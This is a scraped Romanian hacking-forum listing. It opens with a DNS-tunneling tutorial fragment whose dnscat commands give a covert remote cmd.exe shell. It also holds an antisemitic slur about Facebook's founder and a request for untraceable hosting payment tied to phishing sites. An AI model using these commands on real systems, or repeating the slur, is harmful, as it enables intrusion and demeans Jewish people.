primi un request de rezolutie pentru " shell ", va insemna ca am verificat vulnerabilitatea si putem incepe atacul . DNS : Atac post-verificare Noi metode de atac folosind DNS-uri, post-verificare Dupa ce am verificat ca unul dintre atacurile precendent a functionat, putem in continuare sa folosim serviciul DNS pentru a mentine un profil low fara a face prea mult " zgomot " pe reteaua tintei noastre . Vom aveam nevoie de un tool numit dnscat, prezent in internul nbtool, poate fii obtinul prin GitHub . dnscat --listen -p 53 Comanda precedenta : " -listen ", deschide dnscat in modul server ( ascultare ) " -p ", identifica port-ul pe care va face " listening " . 53 fiind default, acela al serviciului DNS Acum putem sa deschidem pe masina tintei, dnscat ca si client, care va reintoarce ca shell de comenzi de windows ( cmd.exe ) . dnscat --dns virtualmachine1 -e cmd.exe Aici : " -dns ", identifica IP-ul sau hostname-ul masinii pe care este pornit dnscat in modalitatea server. " -exec ", porneste promp-ul de comnezi windows Iar acesta in schimb este vizualul serverului . Tot ce este scris si citit de dnscat, trece prin queryDNS, asa cum putem vedea explorand cu Wireshark : Concluzii Am vazut cum sa folosim si sa abuzam de un serviciu care a existat mereu inca din primi ani '80 si pe care tot internetul se bazeaza . Tutorialul ne arata cum este posibil sa obtinem informatii facand query-uri de tip DNS si expoatarea unui canal de comunicare greu filtrat . Multe metode de recunoastere si atac prezente in acet tutorial sunt ramificate din prezentarea lui Ron Bowse . Videoul urmator, este o demonstratie de atac XSS majoritatii site-urilor Whols . Sursa
  15. Expertii in securitate de la G Data SecurityLabs au analizat adware-ul Superfish. In acest proces, analistii au intalnit o componenta de tehnologie in program, numita SSL Digestor. Acesta foloseste un certificat root care este slab securizat ?i are drepturi extinse pe calculator. SSL Digestor intercepteaza conexiuni HTTPS sigure si le poate descifra. In acest fel, conexiunile care sunt de fapt securizate ar putea fi interceptate si atacate. Acest lucru inseamna ca infractorii cibernetici ar putea folosi un atac man-in-the-middle pentru a spiona sau manipula fluxul de date dintre doi parteneri de comunicare, de exemplu o banca si clientul sau, prin utilizarea unui site bancar fals. Potrivit expertilor G DATA, aceasta parte din program este continuta si in alte produse software. Solutiile de securitate G Data detecteaza software-ul ca Gen: Variant.Adware.Superfish.1 (motor A) si Win32.Riskware.Fishbone.A (Engine . Pentru a elimina certificatul periculos, utilizatorii trebuie sa ia masuri. “Superfish este program adware discutabil. Cu toate acestea, din cauza certificatului slab securizat SSL Digestor, este periculos pentru utilizatori,” explica Ralf Benzmuller, seful G DATA SecurityLabs. ” Utilizatorii afectati ar trebui sa elimine imediat certificatul.” Ce este Superfish? Programul Superfish Visual Discovery este livrat pre-instalat pe mai multe modele de notebook-uri Lenovo. Adware-ul a fost un oaspete nedorit de majoritatea utilizatorilor pentru o lunga perioada de timp, chiar daca, de multe ori aceasta nu este neaparat periculos. Superfish este, cu toate acestea, neobisnuit, deoarece contine o componenta de tehnologie numita SSL Digestor, distribuita de Komodia. Aceasta componenta contine un element care declanseaza problema de securitate actuala – un certificat root foarte slab securizat. Superfish este utilizat chiar si pe dispozitive Android Expertii G Data Security au descoperit doua aplicatii de cautare pentru dispozitive Android care se bazeaza pe Discovery Visual Superfish. Similar cu componenta PC, utilizatorilor le sunt prezentate prin reclame anumite interogari de cautare. Cu toate acestea, aplicatiile nu se bazeaza pe SSL Digestor si nu pun in pericol securitatea protocolului HTTPS. Tehnologia submineaza securitatea HTTPS SSL Digestor instaleaza un certificat care permite programului sa analizeze si sa manipuleze fluxul de date in conexiunile HTTPS. Aceasta componenta este gasita in programe adware pe care utilizatorii le instaleaza involuntar si in programe clasificate a fi troieni de catre furnizorii de securitate IT. Chiar si programe aparent legitime se bazeaza pe aceasta componenta. O verificare rapida prin care puteti afla dac? certificatul root este prezent pe computer se poate face aici: https://www.gdatasoftware.com/securitylabs/quickcheck/fishbone?no_cache=1 Informatii detaliate, plus instructiuni cu privire la modul in care poate fi indepartat certificatul Superfish gasiti pe G DATA SecurityBlog: https://blog.gdatasoftware.com/blog/article/the-power-of-trust-superfish-case-turns-into-a-worst-case-scenario.html -> Sursa <-
  16. Copiii-bufni?? ai erei digitale, genera?ia care nu mai doarme noaptea. Ce urm?ri are obiceiul lor Mereu conecta?i la tablete ?i telefoane, copiii ?i adolescen?ii de ast?zi abia dac? mai prind câteva ore de somn pe noapte, comportament care vine „la pachet“ cu multe probleme de s?n?tate ?i cu rezultate ?colare slabe. Dependen?a de noile tehnologii este mai puternic? decât oricând, iar fetele sunt mai vulnerabile, spun psihologii. Genera?ia de copii ?i de adolescen?i de ast?zi doarme cele mai pu?ine ore pe noapte, iar motivul este c? nu se pot desprinde de telefoane ?i tablete. „Copiii-bufni??“, cum a fost numi?i de psihologi tinerii conecta?i la tehnologii pân? târziu în noapte, prind, în medie, ?apte ore ?i jum?tate de somn, în condi?iile în care la vârsta lor au nevoie de opt-zece ore de somn pe noapte, aten?ioneaz? speciali?tii. Noile tehnologii au dat peste cap mai mult decât oricând programul de somn al tinerilor. Ei au acces acum la re?ele de socializare ?i la jocuri la orice or? din zi ?i din noapte. În România, 8 din 10 copii au cont pe o re?ea de socializare, de?i accesul le este, teoretic interzis, potrivit unui studiu. Mai mult, copiii din ?ara noastr? se num?r? printre cei care primesc cel mai devreme un telefon mobil: media de vârst? este de 9 ani, arat? statisticile. În 2014, 26% din copiii români de?ineau un smartphone, iar 10% aveau o tablet?. Lucrurile nu sunt cu mult diferite nici în rândul adolescen?ilor. Ei au chiar mai multe gadgeturi decât angaja?ii sau antreprenorii, ar?ta un studiu realizat de Mercury Research la sfâr?itul anului 2013. “În ultimul timp, copiii care au un program dezordonat din cauza folosirii tabletei sau telefonului sunt din ce în ce mai numero?i. De asemenea, vârsta la care copilul începe s? nu mai respecte un orar prestabilit, s? încalce orele de somn ?i disciplina orelor de studiu ?i joac? începe s? scad? alarmant.” Keren Rosner, psiholog din Bucure?ti Adolescen?ii-vampir care nu dorm niciodat? Nu mai pu?in de 65% din copiii din ziua de azi dorm mai pu?in decât ar trebui, iar mul?i dintre ace?tia au ajuns s? sufere de insomnii, potrivit unui studiu realizat de Sleep Foundation, din Marea Britanie. Pân? ajung la vârsta adolescen?ei, obiceiul acestor copii devine atât de obi?nuit, încât au primit propriul nume: „vampiri“, dup? modelul adolescen?ilor-vampiri care nu dorm niciodat? din pelicula ?i cartea „Amurg“ (engl. – „Twilight“). Adriana S. (49 de ani), din Bucure?ti, este una dintre mamele care simt c? nu mai au niciun control asupra programului de somn al adolescen?ilor lor. Deseori, ea î?i surprinde fiul, Tiberiu (14 ani) înc? treaz la ore târzii din noapte ?i nicio metod? pe care ea a încercat-o nu l-au convins pe adolescent s? mearg? mai devreme la culcare. „Am încercat cu amenin??ri, cu recompense, i-am luat ?i telefonul o s?pt?mân?, dar de fiecare dat? revine la programul lui de «pas?re de noapte» ?i simt c? nu mai pot face nimic în sensul acesta. De câ?iva ani, între noi este un r?zboi tocmai din aceast? cauz? ?i cred c? a devenit o b?t?lie pierdurt? pentru mine. Îmi pare r?u c? i-am luat telefon ?i tablet?, dar nu cred c? a? fi avut o via?? mai lini?tit? cu el dac? a? fi refuzat, în condi?iile în care to?i ceilal?i copii de vârsta lui au a?a ceva“, se plânge Adriana. Fetele sunt chiar mai vulnerabile decât b?ie?ii în fa?a noilor tehnologii, pentru c? nevoia lor de a sta conectate la Facebook, Instagram ?i la alte re?ele este compulsiv?, spun speciali?tii. Pentru tineri, statul pân? la ore târzii este chiar un obicei „cool“, cu care se laud? pe re?elele de socializare. La o simpl? c?utare, vom g?si nenum?rate selfie-uri cu ei în camere semi-întunecate, având ochii ro?ii de la lipsa de somn, dar l?udându-se c? nu dorm toat? noaptea. Danah Boyd, un sociolog britanic ?i autoarea unei c?r?i despre adolescen?i ?i dependen?a de internet, crede c? ace?ti tineri prefer? s? sufere de oboseal? cronic? decât s? renun?e la „timpul lor“ de peste noapte. Acestea sunt singurele momente din zi pe care adolescen?ii le consider? intime ?i în care pot purta conversa?ii feri?i de privirile curioase ?i critice ale adul?ilor. Cu ce riscuri vine „la pachet“ somnul pu?in Somnul pu?in î?i las? amprenta asupra s?n?t??ii, comportamentului ?i performan?elor ?colare ale copiilor ?i adolescen?ilor. Creierul lor nu este pe deplin format la aceste vârste ?i „au nevoie de somn odihnitor ?i suficient pentru a se dezvolta armonios din punct de vedere fizic ?i psihic. Somnul din prima etapa a nop?ii, pân? la ora 12.00, este considerat cel mai benefic pentru creier. Când copilul se priveaz? frecvent de acest remediu, calitatea vie?ii lui va avea de suferit pe termen scurt, dar ?i pe viitor“, mai spune psihologul Keren Rosner. Lipsa de somn vine „la pachet” cu un risc mai mare de depresie ?i de suicid, potrivit unui studiu realizat de Columbia University Medical Center din New York, în rândul a peste 15.000 de tineri cu vârste cuprinse între 12 ?i 18 ani. De asemenea, num?rul mai mic de ore de somn predispune la obezitate, iar adolescen?ii care nu dorm suficient sunt mai furio?i ?i mai recalcitran?i cu p?rin?ii ?i cadrele didactice. În plus, „li se va aplatiza voin?a, nu va mai sim?i bucuria de a face lucruri specifice vârstei ?i se va izola“, atrage aten?ia psihologul. ?i performan?ele ?colare ale copiilor ?i adolescen?ilor au de suferit, pentru c? lipsa de somn afecteaz? memoria ?i concentrarea în timpul zilei. „Sunt convins? s? fiul meu ar putea fi mai mult decât mediocru la ?coal? dac? s-ar odihni mai mult“, crede Adriana, mama adolescentului Tiberiu, din Bucure?ti. Ce pot face p?rin?ii Adul?ii nu pot sta nep?s?tori în fa?a un astfel de comportament care afecteaz? via?a copiilor, dar implicarea lor este o problem? delicat?. „Trebuie s? se implice mai ferm pentru a le ordona via?a, dar nu într-un mod tiranic, nici agresiv, ci prietene?te ?i implicat activ. Decât s? se ajung? la dependen??, mai eficient este ca p?rintele s?-?i supravegheze copilul ?i s? nu permit? s? se ajung? la un asemenea punct critic. Nu este un semn bun când copilul este lini?tit ?i nu te deranjeaz?, fiindc? st? ore în ?ir izolat în camera lui, cu tableta. Iar??i, nu este o solu?ie ca p?rintele doar s? se plâng? de faptul c? nu ?tie cum s? ac?ioneze, eventual doar s? îl certe pe copil ?i s? nu intervin? când copilul st? pân? spre diminea?? la calculator. El ar trebui s?-i ofere alternative copilului, nu doar s?-i interzic? s? petreac? mult timp cu calculatorul sau telefonul“, recomand? psihologul Keren Rosner, care mai puncteaz? s? p?rintele ar trebui s? fie un exemplu pentru copil ?i s? aib? un comportament în concordan?? cu discursul s?u. Autor: Oana Antonescu Sursa: Adevarul.ro
  17. Va rog frumos, daca stie cineva, sa imi spuna unde pot gasi bag of words pentru fitrarea tweets. Am nevoie pentru un proiect. Ma intereseaza cuvinte care pot ajuta la filtrare pentru gasirea oamenilor care posteaza pe twitter mesaje raciste sau care incita la revolta. Am cautat pe diferite siteuri, teze de doctorat si nu am gasit asa ceva. Va multumesc mult!
  18. O sa revin cu reteaua de socializare pt amatorii de informatica pe plan international. Inca o o idee - o retea de socializare romaneasca pt angajatori/doritori de joburi (in folosoul omului de rand). Rog si alte persoane sa vina cu idei noi pe care alte natii idioate nu le au. Retineti ca un jidan idiot a facut Facebookul. O alta idee: Avand i nvedere ca noua lege big bro o sa fie aprobata, o sa fie stire de maxima audienta. Hai sa protejam si sa profitam pe treaba asta. Cu siguranta aici sunt multi oameni cu experienta ce pot combate monitorizarea si sa dezvolte ceva publicului larg...ceva criptat prin intermediul retelelor expuse mai sus. Noi putem mai mult, sunt sigur. Dou?sprezece voci urlau furioase ?i toate erau la fel. Ce se petrecuse cu fe?ele porcilor nu mai era de-acum o dilem?. Fiin?ele de afar? privir? de la porc la om ?i de la om la porc ?i din nou de la porc la om: deja era imposibil s? mai spui care era care. - G. Orwell
  19. 1. Salutare, stie cineva care sunt metodele de plata care sa te faca sa nu ai nicio legatura cu o plata online? Exemple: - cupon paysafe - bitcoin etc 2. Stie cineva vreo firma de webhosting mai permisiva care suporta una dintre aceste metode de plata...?(PLATESC ORICAT!) In legatura cu: https://rstforums.com/forum/97698-site-uri-de-phishing-inchise.rst
  20. Am host de vreo 2 luni si ceva de la hostblast si nu sunt multumit deloc de ei,imi cad site-urile foarte des..imi puteti da o idee?un host bun si la pret sa fie ok?acum nu sariti cu gura,nu vreau neaaparat un host care sa platesc 6$ pe an..dar totusi.Si as vrea un host care sa pot face plata prin payoneer,pentru ca nu am alte metode de plata...
  21. Salut, M-am tot uitat pe marile siteuri de presa si nu numai. Am observat la unele pana si 6 reclame insa majoritatea detin 5 si minim 4. Regula Adsense este de maxim 3. Acum stau si ma intreb... daca doresc sa pun inca un cont? Spre ex al unui prieten, pot avea probleme? Mi-e sila sa tot intreb sau sa ma uit pe google products forum deoarece toti is marsavi. Hmmm. Uite ca acum mi-a venit ideea sa ma uit in cod pe siteurile de presa sa vad daca au toate reclamele acelasi cod de publisher insa totusi nu as vrea sa incalc politica. Poate exista baieti pe aici care stiu mai bine cum stau lucrurile si care folosesc asa ceva de o perioada mai lunga. Ms anticipat pt pareri.
  22. Am o baza de date cu extragerile de la loto care arata cam asa: Ma poate ajuta cineva cu o sintaxa care sa faca urmatorul lucru: Sa imi afiseze doar acele extrageri care au MEDIA intre 15 si 20 dar doar acelea care contin numerele 20 si 30 ? (in cazul de fata este doar una singura, cea evidentiata de mine cu galben) Multumesc mult !
  23. Toata treaba a inceput dupa ce au venit acasa la mine sa-mi traga fibra optica pana in camera si sa-mi dea o monstruozitate de "GPON ONT" (ZTE F660), o corcitura de router cu prea putine optiuni in panoul de control. Lipsa de functii nu se datoreaza firmei ZTE, ci celor de la RDS&RCS care a violat firmwareul, ca nu cumva, doamne fereste, sa poti tu sa-ti pui un DDNS pe router sau alte manarii dinastea satanice. Inainte sa-mi vare pe gat muia aia de router ZTE aveam in CHIRIE de la ei un TL-WDR3600 pentru care plateam 5 LEI lunar, pe langa pretul abonamentului. Bunicel router-ul pentru pretul lui, puteai sa-ti pui antenele tale, era suportat si de open-wrt, mergea excelent. In ziua cand au venit sa-mi traga fibra optica in casa (ca cica nu se mai poate in bloc,e mai elegant asa, ca daca se fute aparatu se fute doar la mine, nu la tot blocul) au venit niste domni, au inceput sa dea gauri, sa taie, sa rupa, sa sudeze fibre optice, tot tacamul, pareau sa stie ce fac. Au terminat treaba pe palier si au intrat in apartament unde a venit un nene, a scos o cutie si in ea se afla minunatia ZTE, insa, inainte sa o puna mi-au deconectat routerul TL-WDR3600 si au inceput sa-l impacheteze frumos, gata sa-l ia. Am ramas prost, i-am intrebat ce se intampla, de ce imi iau router-ul, iar raspunsul lor a fost la fel de competent ca si ei, cica: "nu pot fi doua echipamente RCS&RDS in aceeasi locuinta", m-a lasat masca, cum cacat vii tu si imi iei router-ul pentru care PLATESC LUNAR CHIRIE?!?!?! Aparent de cand am eu abonamentul s-au mai schimbat lucrurile, pretul abonamentului a scazut, iar routerele se ofereau gratuit, nu mai trebuia sa-ti cumperi sau sa inchiriezi de la ei. Asadar, de cateva luni, eu plateam dublu pentru un serviciu care se ieftinise, si pe langa asta mai aveam si routerul pentru care plateam, dar aparent devenise gratuit. N-am avut ce sa le fac, domnii asa primisera instructiuni, sa ia aparatura, precedenta, desi eu o aveam in chirie si plateam pentru ea. A incercat un nene sa o sune pe o tanti, dar tanti la fel de incompetenta si fara rationament i-a zis ca trebuie sa-l ia pentru ca asa zice pe magica foaie cu instructiuni pe care doamnele de la relatii cu clientii le prea-slavesc (nu stiu cum e in realitate, dar eu zic ca ele mai mult ca sigur au o foaie pe care e un scenariu dupa care sa ghideze clientul, si daca ceva nu se intampla conform scenariului creierasul lor incepe sa dea gres si raman blocate si trebe managerul sa le reseteze pentru ca ele nu pot concepe cum ai putea sa ai router si sa se conecteze el prin PPPoE). Asadar m-au lasat si fara router (sa-i vad ce o sa faca cu el ca eu pusesem open-wrt, cred ca o sa aduca "experti" din toata tara ca sa se minuneze si sa se chinuie sa puna firmware-ul original, sau o sa-l arunce direct la gunoi pentru ca e prea complex). Venise a doua zi dupa ce mi-au tras fibra si dau sa intru dimineata pe interneti, pula interneti, aparatu' avea un LED aprins rosu. Sun la ei, le zic ca nu functioneaza, ca e rosu' LED-ul de la "PON" parca, nu mai stiu exact ce s-a aprins, oricum semnala lipsa semnalului optic. Au venit domnii, de data asta alta echipa si au constatat ca mufa nu a fost prinsa cum trebuie, au prins-o, au bagat-o in aparat, a functionat. Toate bune si frumoase, trecusera cateva zile, eu plecasem la facultate si acasa ramasesera ai mei. Astazi constata tatal meu ca nu mai functioneaza WiFi-ul, SSID-ul nu mai era de gasit. Eu fiind la facultate nu puteam sa vad care-i treaba, asa ca i-a sunat pe cei de la RDS pentru ca mai fusesera ceva probleme cu internetu saptamana asta, doar ca le-au remediat destul de rapid. Ajunge echipa la mine acasa, se duce la aparat, cauta reteaua WiFi, dupa indelungi cautari cu laptop-ul lor ajung la uluitoarea concluzie ca chiar nu apare. Era timpul pentru planul B, suna la sediu, acolo un alt expert le zice ca de la pisatul ala de aparat doar un port LAN functioneaza si wifi-ul, restul porturilor nu (desigur, acel expert este si el incompetent si debiteaza aiureli). El voia sa spuna ca un anumit port LAN de la acel aparat este bridged si daca iti bagi cablu' in el trebuie sa te conectezi prin PPPoE de pe computer, dar cum nici care dintre ei nu are pic de pregatire, nu se puteau intelege. Cum nici expertu' de la sediu nu i-a putut satisface nevoile, planul C era singura solutie, baga cablul intr-un port LAN si vrea sa se conecteze la panoul de administrator, ma suna tata sa-mi zica ca nu se poate conecta (expertu' de pe teren incerca sa se conecteze cu utilizatorul si parola default ale router-ului), i-am zis sa-mi dea expertu si ii explic eu cum se face si sa-i zic parola, ii zic parola, o baga, pula, nu a reusit sa intre, aparent este atat de incompetent incat nici sa scrie nu stie, parola era scrisa si pe foaie de tatal meu, mi-a si citit-o pe litere, tot nu i-a mers. I-am spus sa-l reseteze daca nu e in stare sa se logheze, si a zis ceva ca ar dura jumatate de ora sa faca asta si alte idiotenii de genul. De ciuda ca si-a dat seama ca e incompetent a zis ca in mod normal clientii nu au voie sa umble la aparatura si sa schimbe parolele(cum mortii ma-tii sa spui o asemenea idiotenie), pentru ca a fost setata de ei si nu trebuie sa ne atingem, si sa-l fac eu cand vin acasa ca altfel ridica aparatul si il duc la sediu sa vada ce masuri sa ia. Atunci nervii mei au inceput sa iasa prin toate partile si am inceput sa zbier la telefon sa-si dea demisia ca e incompetent si sa se sinucida, telefonul era deja la tata in mana care a inchis instant pentru ca se simtea probabil prost ca auzea expertu cum injuram. Expertii au plecat, au lasat balta operatiunea si l-am sunat pe tata, i-am zis sa deschida team-viewer si am intrat pe un calculator de acasa. M-am logat la panoul de administrator si ce sa vezi surpriza, parola de la WiFi era aceeasi, in schimb SSID-ul era cel default "DIGI-xxxx", nu acela care-l setasem eu. L-am schimbat in cel vechi si totul mergea cum trebuie. Teoria mea este ca expertii de la sediu au pus un alt firmware update si din cate am observat atunci cand au pus aparatul, el isi cauta update-uri mereu pe retea si le instaleaza automat. Tare am impresia ca s-a schimbat SSID-ul pentru ca au facut o astfel de magarie. Deocamdata merge internetul, desi nu de mult a plecat echipa de acasa. Prea mult de citit? Rezumat: TOTI angajatii RCS&RDS care ar trebuii sa stie cate ceva nu stiu de fapt nimic si sunt inutili. Au fost invatati cum sa puna 2 mufe si sa traga un cablu, ATAT. Daca aceasta povestioara va fi citita de cineva de la RDS&RCS, sfatul meu este sa va lasati de meserie, nu are rost. Nu sunt eu ceva expert, dar de nevoie am invatat chestiile de baza si ma pot descurca cu un cacat de router pe care VOI ar trebuii sa-l cunoasteti ca-n palma pentru ca le fortati consumatorilor pe gat, dar va taiati ca maioneza cand ceva nu merge ca-n scenariu'. Ma intreb daca cineva de la RCS&RDS are totusi ceva cunostinte, sau toti sunt niste robotei spalati pe creier si programati sa faca doar un singur lucru pe care il fac oricum prost. Am scris povestea asta de nervi, scuzati greselile, poate e plictisitoare, dar am simtit nevoia sa ma descarc, pentru ca sunt sigur ca nu sunt singurul cu astfel de experiente.
  24. Ce consuma mai puteine resurse Xp sau ubuntu sau care>?
  25. EU PROPUN SA ALEGEM UN SFANT SAU OM CU DUHUL LUI DUMNEZEU PENTRU HACKERI IN SPECIAL,SI CEI CARE LUCREAZA LA CALCULATOARE IN SPECIAL.SI DE CE NU,SA PUNEM SI LA ACEST FORUM O ICONITA UNDEVA INTR-UN LOCAS,IAR CINE E ATEU SA O POATA INCHIDE.SA DAM UN EXEMPLU LA TOATE COMUNITATILE DE ORTODOCSI SI NU NUMAI.PENTRU CA SPIRITUL LUI DUMNEZEU SA OCROTEASCA TOTI CEI DIN DOMENIUL.DACA SE ALEGE,SUNT HOTARAT SA VIN DIN ITALIA SI SA MA DUC CU CEREREA LA PATRIARCUL DANIEL SA APROBE. PROPUNEREA MEA E PENTRU SFANTUL ILIE,NU PENTRU CA ASA MA CHEAMA PE MINE,CI FIINDCA A FOST CU PUTERE MARE,E SINGURUL CARE A FOST LUAT LA CERURI CU TRUPUL,EL SI PROROCUL ENOH,SI POATE SIMBOLIZA CA CEI CARE LUCREAZA IN ACEST DOMENIU SE IAU IN ALTA DIMENSIUNI SAU REALITATE CU MINTEA,DESI CU TRUPUL ESTE LA CALCULATOARE.II ROG PE CEI CARE SUNT ATEI SA SE ABTINA SAU DOAR SA VOTEZE,SA NU INJURE SFINTII LUI DUMNEZEU,CA AM SI EU PACAT CA EU AM DESCHIS DISCUTIA,IAR EI NU STIU CE FAC,DAR TREBUIA SI O INITIATIVA DE ACEST FEL PENTRU TOTI CRESTINII.VOTATI CE CREDETI,CU INIMA,NU CU MINTEA.DOAMNE-AJUTA!
×
×
  • Create New...